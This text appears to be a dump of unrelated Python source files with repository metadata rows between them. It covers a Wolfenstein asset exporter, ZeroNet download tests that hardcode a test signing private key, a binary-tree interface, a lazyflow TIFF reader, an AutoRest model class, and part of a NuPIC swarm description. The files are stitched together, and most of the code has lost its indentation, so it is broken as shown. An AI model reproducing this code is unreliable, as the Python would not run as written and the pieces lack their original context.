wave_write(wave_file, params.wave_rate, samples)
zip_file.writestr(path, wave_file.getbuffer())
logger.info('Done')
_sep()
def export_musics(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting musics')
start, count = cfg.AUDIO_PARTITIONS_MAP['music']
for i in range(count):
chunk_index = start + i
name = cfg.MUSIC_LABELS[i]
path = 'music/{}/{}.ogg'.format(params.short_name, name)
logger.info('Music [%d/%d]: %r', (i + 1), count, path)
imf_chunk = audio_chunks_handler[chunk_index]
wave_path = convert_imf_to_wave(imf_chunk, params.imf2wav_path,
wave_rate=params.ogg_rate, imf_rate=params.imf_rate)
try:
ogg_path = convert_wave_to_ogg(wave_path, params.oggenc2_path)
zip_file.write(ogg_path, path)
finally:
_force_unlink(wave_path, ogg_path)
logger.info('Done')
_sep()
def export_adlib_sounds(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting AdLib sounds')
start, count = cfg.AUDIO_PARTITIONS_MAP['adlib']
adlib_manager = pywolf.audio.AdLibSoundManager(audio_chunks_handler, start, count)
for i, sound in enumerate(adlib_manager):
name = cfg.ADLIB_SOUND_NAMES[i]
path = 'sound/{}/adlib/{}.ogg'.format(params.short_name, name)
logger.info('AdLib sound [%d/%d]: %r', (i + 1), count, path)
imf_chunk = sound.to_imf_chunk()
wave_path = convert_imf_to_wave(imf_chunk, params.imf2wav_path,
wave_rate=params.ogg_rate, imf_rate=params.imf_rate)
try:
ogg_path = convert_wave_to_ogg(wave_path, params.oggenc2_path)
zip_file.write(ogg_path, path)
finally:
_force_unlink(wave_path, ogg_path)
logger.info('Done')
_sep()
def export_buzzer_sounds(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting buzzer sounds')
start, count = cfg.AUDIO_PARTITIONS_MAP['buzzer']
buzzer_manager = pywolf.audio.BuzzerSoundManager(audio_chunks_handler, start, count)
for i, sound in enumerate(buzzer_manager):
name = cfg.BUZZER_SOUND_NAMES[i]
path = 'sound/{}/buzzer/{}.wav'.format(params.short_name, name)
logger.info('Buzzer sound [%d/%d]: %r', (i + 1), count, path)
wave_file = io.BytesIO()
sound.wave_write(wave_file, params.wave_rate)
zip_file.writestr(path, wave_file.getbuffer())
logger.info('Done')
_sep()
def export_tilemaps(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting tilemaps (Q3Map2 *.map)')
start, count = 0, sum(episode[1] for episode in cfg.EPISODES)
tilemap_manager = pywolf.game.TileMapManager(audio_chunks_handler, start, count)
i = 1
for episode_index, episode in enumerate(cfg.EPISODES):
for submap_index in range(episode[1]):
tilemap_index = episode[0] + submap_index
tilemap = tilemap_manager[tilemap_index]
name = '{}_e{}m{}'.format(params.short_name, episode_index + 1, submap_index + 1)
folder = os.path.join(params.output_folder, 'maps')
os.makedirs(folder, exist_ok=True)
path = os.path.join(folder, (name + '.map'))
logger.info('TileMap [%d/%d]: %r = %r', i, count, path, tilemap.name)
exporter = MapExporter(params, cfg, tilemap, episode_index, submap_index)
description = '\n'.join(exporter.describe_tilemap())
with open(path, 'wt') as map_file:
map_file.write(description)
path = 'maps/{}.map'.format(name)
zip_file.writestr(path, description)
i += 1
logger.info('Done')
_sep()
def main(*args):
logger = logging.getLogger()
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(logging.DEBUG)
logger.addHandler(stdout_handler)
logger.setLevel(logging.DEBUG)
parser = build_argument_parser()
params = parser.parse_args(args)
logger.info('Command-line parameters:')
for key, value in sorted(params.__dict__.items()):
logger.info('%s = %r', key, value)
_sep()
cfg = load_as_module('cfg', params.cfg)
vswap_data_path = os.path.join(params.input_folder, params.vswap_data)
logger.info('Precaching VSwap chunks: <data>=%r', vswap_data_path)
vswap_chunks_handler = pywolf.persistence.VSwapChunksHandler()
with open(vswap_data_path, 'rb') as data_file:
vswap_chunks_handler.load(data_file)
vswap_chunks_handler = pywolf.persistence.PrecachedChunksHandler(vswap_chunks_handler)
_sep()
audio_data_path = os.path.join(params.input_folder, params.audio_data)
audio_header_path = os.path.join(params.input_folder, params.audio_header)
logger.info('Precaching audio chunks: <data>=%r, <header>=%r', audio_data_path, audio_header_path)
audio_chunks_handler = pywolf.persistence.AudioChunksHandler()
with open(audio_data_path, 'rb') as (data_file
), open(audio_header_path, 'rb') as header_file:
audio_chunks_handler.load(data_file, header_file)
audio_chunks_handler = pywolf.persistence.PrecachedChunksHandler(audio_chunks_handler)
_sep()
graphics_data_path = os.path.join(params.input_folder, params.graphics_data)
graphics_header_path = os.path.join(params.input_folder, params.graphics_header)
graphics_huffman_path = os.path.join(params.input_folder, params.graphics_huffman)
logger.info('Precaching graphics chunks: <data>=%r, <header>=%r, <huffman>=%r',
graphics_data_path, graphics_header_path, graphics_huffman_path)
graphics_chunks_handler = pywolf.persistence.GraphicsChunksHandler()
with open(graphics_data_path, 'rb') as (data_file
), open(graphics_header_path, 'rb') as (header_file
), open(graphics_huffman_path, 'rb') as huffman_file:
graphics_chunks_handler.load(data_file, header_file, huffman_file, cfg.GRAPHICS_PARTITIONS_MAP)
graphics_chunks_handler = pywolf.persistence.PrecachedChunksHandler(graphics_chunks_handler)
_sep()
maps_data_path = os.path.join(params.input_folder, params.maps_data)
maps_header_path = os.path.join(params.input_folder, params.maps_header)
logger.info('Precaching map chunks: <data>=%r, <header>=%r', maps_data_path, maps_header_path)
tilemap_chunks_handler = pywolf.persistence.MapChunksHandler()
with open(maps_data_path, 'rb') as (data_file
), open(maps_header_path, 'rb') as header_file:
tilemap_chunks_handler.load(data_file, header_file)
tilemap_chunks_handler = pywolf.persistence.PrecachedChunksHandler(tilemap_chunks_handler)
_sep()
pk3_path = os.path.join(params.output_folder, params.output_pk3)
logger.info('Creating PK3 (ZIP/deflated) file: %r', pk3_path)
with zipfile.ZipFile(pk3_path, 'w', zipfile.ZIP_DEFLATED) as pk3_file:
_sep()
export_tilemaps(params, cfg, pk3_file, tilemap_chunks_handler)
export_shaders(params, cfg, pk3_file)
export_textures(params, cfg, pk3_file, vswap_chunks_handler)
export_sprites(params, cfg, pk3_file, vswap_chunks_handler)
export_pictures(params, cfg, pk3_file, graphics_chunks_handler)
export_tile8(params, cfg, pk3_file, graphics_chunks_handler)
export_screens(params, cfg, pk3_file, graphics_chunks_handler)
export_helparts(params, cfg, pk3_file, graphics_chunks_handler)
export_endarts(params, cfg, pk3_file, graphics_chunks_handler)
export_sampled_sounds(params, cfg, pk3_file, vswap_chunks_handler)
export_adlib_sounds(params, cfg, pk3_file, audio_chunks_handler)
export_buzzer_sounds(params, cfg, pk3_file, audio_chunks_handler)
export_musics(params, cfg, pk3_file, audio_chunks_handler)
logger.info('PK3 archived successfully')
if __name__ == '__main__':
main(*sys.argv[1:])
| gpl-3.0 | 7,717,207,670,447,818,000 | 39.547742 | 116 | 0.571163 | false |
frerepoulet/ZeroNet | src/Test/TestSiteDownload.py | 1 | 15361 | import time
import pytest
import mock
import gevent
from Connection import ConnectionServer
from Config import config
from File import FileRequest
from File import FileServer
from Site import Site
import Spy
@pytest.mark.usefixtures("resetTempSettings")
@pytest.mark.usefixtures("resetSettings")
class TestSiteDownload:
def testDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
assert site.storage.directory == config.data_dir + "/" + site.address
assert site_temp.storage.directory == config.data_dir + "-temp/" + site.address
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = ConnectionServer("127.0.0.1", 1545)
site_temp.connection_server = client
site_temp.announce = mock.MagicMock(return_value=True) # Don't try to find peers from the net
site_temp.addPeer("127.0.0.1", 1544)
with Spy.Spy(FileRequest, "route") as requests:
def boostRequest(inner_path):
# I really want these file
if inner_path == "index.html":
site_temp.needFile("data/img/multiuser.png", priority=5, blocking=False)
site_temp.needFile("data/img/direct_domains.png", priority=5, blocking=False)
site_temp.onFileDone.append(boostRequest)
site_temp.download(blind_includes=True).join(timeout=5)
file_requests = [request[2]["inner_path"] for request in requests if request[0] in ("getFile", "streamFile")]
# Test priority
assert file_requests[0:2] == ["content.json", "index.html"] # Must-have files
assert file_requests[2:4] == ["css/all.css", "js/all.js"] # Important assets
assert file_requests[4] == "dbschema.json" # Database map
assert file_requests[5:7] == ["data/img/multiuser.png", "data/img/direct_domains.png"] # Directly requested files
assert "-default" in file_requests[-1] # Put default files for cloning to the end
# Check files
bad_files = site_temp.storage.verifyFiles(quick_check=True)
# -1 because data/users/1J6... user has invalid cert
assert len(site_temp.content_manager.contents) == len(site.content_manager.contents) - 1
assert not bad_files
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
def testArchivedDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = FileServer("127.0.0.1", 1545)
client.sites[site_temp.address] = site_temp
site_temp.connection_server = client
# Download normally
site_temp.addPeer("127.0.0.1", 1544)
site_temp.download(blind_includes=True).join(timeout=5)
bad_files = site_temp.storage.verifyFiles(quick_check=True)
assert not bad_files
assert "data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json" in site_temp.content_manager.contents
assert site_temp.storage.isFile("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json")
assert len(list(site_temp.storage.query("SELECT * FROM comment"))) == 2
# Add archived data
assert not "archived" in site.content_manager.contents["data/users/content.json"]["user_contents"]
assert not site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", time.time()-1)
site.content_manager.contents["data/users/content.json"]["user_contents"]["archived"] = {"1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q": time.time()}
site.content_manager.sign("data/users/content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
date_archived = site.content_manager.contents["data/users/content.json"]["user_contents"]["archived"]["1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q"]
assert site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived-1)
assert site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived)
assert not site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived+1) # Allow user to update archived data later
# Push archived update
assert not "archived" in site_temp.content_manager.contents["data/users/content.json"]["user_contents"]
site.publish()
site_temp.download(blind_includes=True).join(timeout=5) # Wait for download
# The archived content should disappear from remote client
assert "archived" in site_temp.content_manager.contents["data/users/content.json"]["user_contents"]
assert "data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json" not in site_temp.content_manager.contents
assert not site_temp.storage.isDir("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q")
assert len(list(site_temp.storage.query("SELECT * FROM comment"))) == 1
assert len(list(site_temp.storage.query("SELECT * FROM json WHERE directory LIKE '%1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q%'"))) == 0
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
# Test when connected peer has the optional file
def testOptionalDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = ConnectionServer("127.0.0.1", 1545)
site_temp.connection_server = client
site_temp.announce = mock.MagicMock(return_value=True) # Don't try to find peers from the net
site_temp.addPeer("127.0.0.1", 1544)
# Download site
site_temp.download(blind_includes=True).join(timeout=5)
# Download optional data/optional.txt
site.storage.verifyFiles(quick_check=True) # Find what optional files we have
optional_file_info = site_temp.content_manager.getFileInfo("data/optional.txt")
assert site.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.storage.isFile("data/optional.txt")
assert site.storage.isFile("data/optional.txt")
site_temp.needFile("data/optional.txt")
assert site_temp.storage.isFile("data/optional.txt")
# Optional user file
assert not site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
optional_file_info = site_temp.content_manager.getFileInfo(
"data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif"
)
assert site.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
site_temp.needFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
# Test when connected peer does not has the file, so ask him if he know someone who has it
def testFindOptional(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init full source server (has optional files)
site_full = Site("1TeSTvb4w2PWE81S2rEELgmX2GCCExQGT")
file_server_full = FileServer("127.0.0.1", 1546)
site_full.connection_server = file_server_full
gevent.spawn(lambda: ConnectionServer.start(file_server_full))
time.sleep(0.001) # Port opening
file_server_full.sites[site_full.address] = site_full # Add site
site_full.storage.verifyFiles(quick_check=True) # Check optional files
site_full_peer = site.addPeer("127.0.0.1", 1546) # Add it to source server
hashfield = site_full_peer.updateHashfield() # Update hashfield
assert len(site_full.content_manager.hashfield) == 8
assert hashfield
assert site_full.storage.isFile("data/optional.txt")
assert site_full.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert len(site_full_peer.hashfield) == 8
# Remove hashes from source server
for hash in list(site.content_manager.hashfield):
site.content_manager.hashfield.remove(hash)
# Init client server
site_temp.connection_server = ConnectionServer("127.0.0.1", 1545)
site_temp.addPeer("127.0.0.1", 1544) # Add source server
# Download normal files
site_temp.log.info("Start Downloading site")
site_temp.download(blind_includes=True).join(timeout=5)
# Download optional data/optional.txt
optional_file_info = site_temp.content_manager.getFileInfo("data/optional.txt")
optional_file_info2 = site_temp.content_manager.getFileInfo("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert not site_temp.storage.isFile("data/optional.txt")
assert not site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert not site.content_manager.hashfield.hasHash(optional_file_info["sha512"]) # Source server don't know he has the file
assert not site.content_manager.hashfield.hasHash(optional_file_info2["sha512"]) # Source server don't know he has the file
assert site_full_peer.hashfield.hasHash(optional_file_info["sha512"]) # Source full peer on source server has the file
assert site_full_peer.hashfield.hasHash(optional_file_info2["sha512"]) # Source full peer on source server has the file
assert site_full.content_manager.hashfield.hasHash(optional_file_info["sha512"]) # Source full server he has the file
assert site_full.content_manager.hashfield.hasHash(optional_file_info2["sha512"]) # Source full server he has the file
site_temp.log.info("Request optional files")
with Spy.Spy(FileRequest, "route") as requests:
# Request 2 file same time
threads = []
threads.append(site_temp.needFile("data/optional.txt", blocking=False))
threads.append(site_temp.needFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif", blocking=False))
gevent.joinall(threads)
assert len([request for request in requests if request[0] == "findHashIds"]) == 1 # findHashids should call only once
assert site_temp.storage.isFile("data/optional.txt")
assert site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.storage.deleteFiles()
file_server_full.stop()
[connection.close() for connection in file_server.connections]
def testUpdate(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
assert site.storage.directory == config.data_dir + "/" + site.address
assert site_temp.storage.directory == config.data_dir + "-temp/" + site.address
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = FileServer("127.0.0.1", 1545)
client.sites[site_temp.address] = site_temp
site_temp.connection_server = client
# Don't try to find peers from the net
site.announce = mock.MagicMock(return_value=True)
site_temp.announce = mock.MagicMock(return_value=True)
# Connect peers
site_temp.addPeer("127.0.0.1", 1544)
# Download site from site to site_temp
site_temp.download(blind_includes=True).join(timeout=5)
# Update file
data_original = site.storage.open("data/data.json").read()
data_new = data_original.replace('"ZeroBlog"', '"UpdatedZeroBlog"')
assert data_original != data_new
site.storage.open("data/data.json", "wb").write(data_new)
assert site.storage.open("data/data.json").read() == data_new
assert site_temp.storage.open("data/data.json").read() == data_original
site.log.info("Publish new data.json without patch")
# Publish without patch
with Spy.Spy(FileRequest, "route") as requests:
site.content_manager.sign("content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
site.publish()
time.sleep(0.1)
site_temp.download(blind_includes=True).join(timeout=5)
assert len([request for request in requests if request[0] in ("getFile", "streamFile")]) == 1
assert site_temp.storage.open("data/data.json").read() == data_new
# Close connection to avoid update spam limit
site.peers.values()[0].remove()
site.addPeer("127.0.0.1", 1545)
site_temp.peers.values()[0].ping() # Connect back
time.sleep(0.1)
# Update with patch
data_new = data_original.replace('"ZeroBlog"', '"PatchedZeroBlog"')
assert data_original != data_new
site.storage.open("data/data.json-new", "wb").write(data_new)
assert site.storage.open("data/data.json-new").read() == data_new
assert site_temp.storage.open("data/data.json").read() != data_new
# Generate diff
diffs = site.content_manager.getDiffs("content.json")
assert not site.storage.isFile("data/data.json-new") # New data file removed
assert site.storage.open("data/data.json").read() == data_new # -new postfix removed
assert "data/data.json" in diffs
assert diffs["data/data.json"] == [('=', 2), ('-', 29), ('+', ['\t"title": "PatchedZeroBlog",\n']), ('=', 31102)]
# Publish with patch
site.log.info("Publish new data.json with patch")
with Spy.Spy(FileRequest, "route") as requests:
site.content_manager.sign("content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
site.publish(diffs=diffs)
site_temp.download(blind_includes=True).join(timeout=5)
assert len([request for request in requests if request[0] in ("getFile", "streamFile")]) == 0
assert site_temp.storage.open("data/data.json").read() == data_new
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
| gpl-2.0 | -2,810,019,909,871,408,600 | 50.720539 | 173 | 0.679643 | false |
UB-info/estructura-datos | RafaelArqueroGimeno_S6/ABBInterface.py | 1 | 1812 | import copy
from itertools import cycle, islice
from model import *
import view
import parserLastFM
__author__ = "Rafael Arquero Gimeno"
def add(users, parser):
"""
:type users: ABB
:param parser: File parser
:return: A Binary Search Tree containing old + parsed values
"""
for user in islice(parser, 5000):
users.insert(user)
return users
def search(source, minimum=0.0, maximum=1.0):
"""Returns an iterator that returns values inside the interval in the given tree
:rtype : generator
:param source: Original Tree
:param minimum: lower bound
:param maximum: higher bound
"""
assert minimum <= maximum
# tree is passed by reference, copy is done to safely operate through tree
result = copy.copy(source)
result.deleteLower(minimum).deleteHigher(maximum)
return cycle(result) if result else None
def remove(source, minimum=0.0, maximum=1.0):
"""Returns a tree with with the values of given source if they are out of given interval
:type source: ABB
"""
assert minimum <= maximum
lowers, highers = copy.copy(source), copy.copy(source)
lowers.deleteHigher(minimum)
highers.deleteLower(maximum)
root = highers.min # the lowest of highers, can be the root
highers.delete(root, wholeNode=True)
result = ABB().insert(root)
result.root.left = lowers.root
result.root.right = highers.root
return result
def useful_info(tree):
"""Returns a string with useful info about the given ABB
:type tree: ABB
"""
return "Depth: " + str(tree.depth)
def emptyType():
return ABB()
if __name__ == "__main__":
parser = parserLastFM.parser("LastFM_small.dat")
app = view.MainApp(parser, add, search, remove, useful_info, emptyType())
app.mainloop()
| mit | -3,641,968,380,993,265,000 | 23.16 | 92 | 0.674393 | false |
stuarteberg/lazyflow | lazyflow/operators/ioOperators/opTiffReader.py | 1 | 7430 | import numpy
# Note: tifffile can also be imported from skimage.external.tifffile.tifffile_local,
# but we can't use that module because it is based on a version of tifffile that has a bug.
# (It doesn't properly import the tifffile.c extension module.)
#import skimage.external.tifffile.tifffile_local as tifffile
import tifffile
import _tifffile
if tifffile.decodelzw != _tifffile.decodelzw:
import warnings
warnings.warn("tifffile C-extension is not working, probably due to a bug in tifffile._replace_by().\n"
"TIFF decompression will be VERY SLOW.")
import vigra
from lazyflow.graph import Operator, InputSlot, OutputSlot
from lazyflow.roi import roiToSlice
from lazyflow.request import RequestLock
import logging
logger = logging.getLogger(__name__)
class OpTiffReader(Operator):
"""
Reads TIFF files as an ND array. We use two different libraries:
- To read the image metadata (determine axis order), we use tifffile.py (by Christoph Gohlke)
- To actually read the data, we use vigra (which supports more compression types, e.g. JPEG)
Note: This operator intentionally ignores any colormap
information and uses only the raw stored pixel values.
(In fact, avoiding the colormapping is not trivial using the tifffile implementation.)
TODO: Add an option to output color-mapped pixels.
"""
Filepath = InputSlot()
Output = OutputSlot()
TIFF_EXTS = ['.tif', '.tiff']
def __init__(self, *args, **kwargs):
super( OpTiffReader, self ).__init__( *args, **kwargs )
self._filepath = None
self._page_shape = None
def setupOutputs(self):
self._filepath = self.Filepath.value
with tifffile.TiffFile(self._filepath) as tiff_file:
series = tiff_file.series[0]
if len(tiff_file.series) > 1:
raise RuntimeError("Don't know how to read TIFF files with more than one image series.\n"
"(Your image has {} series".format( len(tiff_file.series) ))
axes = series.axes
shape = series.shape
pages = series.pages
first_page = pages[0]
dtype_code = first_page.dtype
if first_page.is_palette:
# For now, we don't support colormaps.
# Drop the (last) channel axis
# (Yes, there can be more than one :-/)
last_C_pos = axes.rfind('C')
assert axes[last_C_pos] == 'C'
axes = axes[:last_C_pos] + axes[last_C_pos+1:]
shape = shape[:last_C_pos] + shape[last_C_pos+1:]
# first_page.dtype refers to the type AFTER colormapping.
# We want the original type.
key = (first_page.sample_format, first_page.bits_per_sample)
dtype_code = self._dtype = tifffile.TIFF_SAMPLE_DTYPES.get(key, None)
# From the tifffile.TiffPage code:
# -----
# The internal, normalized '_shape' attribute is 6 dimensional:
#
# 0. number planes (stk)
# 1. planar samples_per_pixel
# 2. image_depth Z (sgi)
# 3. image_length Y
# 4. image_width X
# 5. contig samples_per_pixel
(N, P, D, Y, X, S) = first_page._shape
assert N == 1, "Don't know how to handle any number of planes except 1 (per page)"
assert P == 1, "Don't know how to handle any number of planar samples per pixel except 1 (per page)"
assert D == 1, "Don't know how to handle any image depth except 1"
if S == 1:
self._page_shape = (Y,X)
self._page_axes = 'yx'
else:
assert shape[-3:] == (Y,X,S)
self._page_shape = (Y,X,S)
self._page_axes = 'yxc'
assert 'C' not in axes, \
"If channels are in separate pages, then each page can't have multiple channels itself.\n"\
"(Don't know how to weave multi-channel pages together.)"
self._non_page_shape = shape[:-len(self._page_shape)]
assert shape == self._non_page_shape + self._page_shape
assert self._non_page_shape or len(pages) == 1
axes = axes.lower().replace('s', 'c')
if 'i' in axes:
for k in 'tzc':
if k not in axes:
axes = axes.replace('i', k)
break
if 'i' in axes:
raise RuntimeError("Image has an 'I' axis, and I don't know what it represents. "
"(Separate T,Z,C axes already exist.)")
self.Output.meta.shape = shape
self.Output.meta.axistags = vigra.defaultAxistags( axes )
self.Output.meta.dtype = numpy.dtype(dtype_code).type
self.Output.meta.ideal_blockshape = ((1,) * len(self._non_page_shape)) + self._page_shape
def execute(self, slot, subindex, roi, result):
"""
Use vigra (not tifffile) to read the result.
This allows us to support JPEG-compressed TIFFs.
"""
num_page_axes = len(self._page_shape)
roi = numpy.array( [roi.start, roi.stop] )
page_index_roi = roi[:, :-num_page_axes]
roi_within_page = roi[:, -num_page_axes:]
logger.debug("Roi: {}".format(map(tuple, roi)))
# Read each page out individually
page_index_roi_shape = page_index_roi[1] - page_index_roi[0]
for roi_page_ndindex in numpy.ndindex(*page_index_roi_shape):
if self._non_page_shape:
tiff_page_ndindex = roi_page_ndindex + page_index_roi[0]
tiff_page_list_index = numpy.ravel_multi_index(tiff_page_ndindex, self._non_page_shape)
logger.debug( "Reading page: {} = {}".format( tuple(tiff_page_ndindex), tiff_page_list_index ) )
page_data = vigra.impex.readImage(self._filepath, dtype='NATIVE', index=int(tiff_page_list_index), order='C')
else:
# Only a single page
page_data = vigra.impex.readImage(self._filepath, dtype='NATIVE', index=0, order='C')
page_data = page_data.withAxes(self._page_axes)
assert page_data.shape == self._page_shape, \
"Unexpected page shape: {} vs {}".format( page_data.shape, self._page_shape )
result[ roi_page_ndindex ] = page_data[roiToSlice(*roi_within_page)]
def propagateDirty(self, slot, subindex, roi):
if slot == self.Filepath:
self.Output.setDirty( slice(None) )
if __name__ == "__main__":
from lazyflow.graph import Graph
graph = Graph()
opReader = OpTiffReader(graph=graph)
opReader.Filepath.setValue('/groups/flyem/home/bergs/Downloads/Tiff_t4_HOM3_10frames_4slices_28sec.tif')
print opReader.Output.meta.axistags
print opReader.Output.meta.shape
print opReader.Output.meta.dtype
print opReader.Output[2:3,2:3,2:3,10:20,20:50].wait().shape
# opReader.Filepath.setValue('/magnetic/data/synapse_small.tiff')
# print opReader.Output.meta.axistags
# print opReader.Output.meta.shape
# print opReader.Output.meta.dtype
| lgpl-3.0 | 642,158,149,604,213,600 | 42.964497 | 125 | 0.577793 | false |
sharadagarwal/autorest | AutoRest/Generators/Python/Azure.Python.Tests/Expected/AcceptanceTests/StorageManagementClient/storagemanagementclient/models/check_name_availability_result.py | 1 | 1683 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CheckNameAvailabilityResult(Model):
"""
The CheckNameAvailability operation response.
:param name_available: Gets a boolean value that indicates whether the
name is available for you to use. If true, the name is available. If
false, the name has already been taken or invalid and cannot be used.
:type name_available: bool
:param reason: Gets the reason that a storage account name could not be
used. The Reason element is only returned if NameAvailable is false.
Possible values include: 'AccountNameInvalid', 'AlreadyExists'
:type reason: str or :class:`Reason
<storagemanagementclient.models.Reason>`
:param message: Gets an error message explaining the Reason value in more
detail.
:type message: str
"""
_attribute_map = {
'name_available': {'key': 'nameAvailable', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'Reason'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(self, name_available=None, reason=None, message=None):
self.name_available = name_available
self.reason = reason
self.message = message
| mit | 6,416,804,943,986,815,000 | 39.071429 | 77 | 0.630422 | false |
akhilaananthram/nupic.research | sequence_prediction/continuous_sequence/swarm_sine/description.py | 1 | 12630 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by the OPF Experiment Generator to generate the actual
description.py file by replacing $XXXXXXXX tokens with desired values.
This description.py file was generated by:
'/Users/ycui/nta/nupic/nupic/frameworks/opf/exp_generator/ExpGenerator.pyc'
"""
from nupic.frameworks.opf.expdescriptionapi import ExperimentDescriptionAPI
from nupic.frameworks.opf.expdescriptionhelpers import (
updateConfigFromSubConfig,
applyValueGettersToContainer
)
from nupic.frameworks.opf.clamodelcallbacks import *
from nupic.frameworks.opf.metrics import MetricSpec
from nupic.frameworks.opf.opfutils import (InferenceType,
InferenceElement)
from nupic.support import aggregationDivide
from nupic.frameworks.opf.opftaskdriver import (
IterationPhaseSpecLearnOnly,
IterationPhaseSpecInferOnly,
IterationPhaseSpecLearnAndInfer)
# Model Configuration Dictionary:
#
# Define the model parameters and adjust for any modifications if imported
# from a sub-experiment.
#
# These fields might be modified by a sub-experiment; this dict is passed
# between the sub-experiment and base experiment
#
#
config = {
# Type of model that the rest of these parameters apply to.
'model': "CLA",
# Version that specifies the format of the config.
'version': 1,
# Intermediate variables used to compute fields in modelParams and also
# referenced from the control section.
'aggregationInfo': { 'days': 0,
'fields': [],
'hours': 0,
'microseconds': 0,
'milliseconds': 0,
'minutes': 0,
'months': 0,
'seconds': 0,
'weeks': 0,
'years': 0},
'predictAheadTime': None,
# Model parameter dictionary.
'modelParams': {
# The type of inference that this model will perform
'inferenceType': 'TemporalMultiStep',
'sensorParams': {
# Sensor diagnostic output verbosity control;
# if > 0: sensor region will print out on screen what it's sensing
# at each step 0: silent; >=1: some info; >=2: more info;
# >=3: even more info (see compute() in py/regions/RecordSensor.py)
'verbosity' : 0,
# Example:
# 'encoders': {'field1': {'fieldname': 'field1', 'n':100,
# 'name': 'field1', 'type': 'AdaptiveScalarEncoder',
# 'w': 21}}
#
'encoders': {
u'data': { 'clipInput': True,
'fieldname': u'data',
'maxval': 1.0,
'minval': -1.0,
'n': 100,
'name': u'data',
'type': 'ScalarEncoder',
'w': 21},
'_classifierInput': { 'classifierOnly': True,
'clipInput': True,
'fieldname': u'data',
'maxval': 1.0,
'minval': -1.0,
'n': 100,
'name': '_classifierInput',
